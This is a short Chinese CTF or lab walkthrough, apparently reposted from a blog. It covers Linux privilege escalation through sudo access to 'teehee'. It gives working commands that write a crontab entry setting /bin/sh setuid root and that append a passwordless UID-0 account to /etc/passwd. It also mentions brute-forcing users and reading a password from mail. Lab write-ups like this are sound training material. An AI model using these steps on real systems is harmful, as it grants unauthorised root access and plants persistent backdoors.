可以执行系统命令
看到三个用户,可以用来爆破
var/mail看到charles的密码
操作过程如下:
1、echo root chmod 4777 /bin/sh > /etc/crontab
2、sudo teehee /etc/crontab,然后写入的内容:* * * * * root chmod 4777 /bin/sh
(时间部分全部填写为*,默认这个定时任务每分钟执行一次。通过执行的脚本将 /bin/sh 的权限修改为4777,这样就可以在非root用户下执行它,并且执行期间拥有root权限。)
3、ls -la /bin/sh
4、/bin/sh
添加一个admin账户,然后使用teehee执行直接写入 passwd中,然后切换为创建的admin用户
1、echo "test::0:0:::/bin/bash"
2、sudo teehee -a /etc/passwd
3、输入:test::0:0:::/bin/bash
4、然后ctrl+c退出,再su test切换用户,即可获得root权限
原文:https://www.cnblogs.com/liyu8/p/14530379.html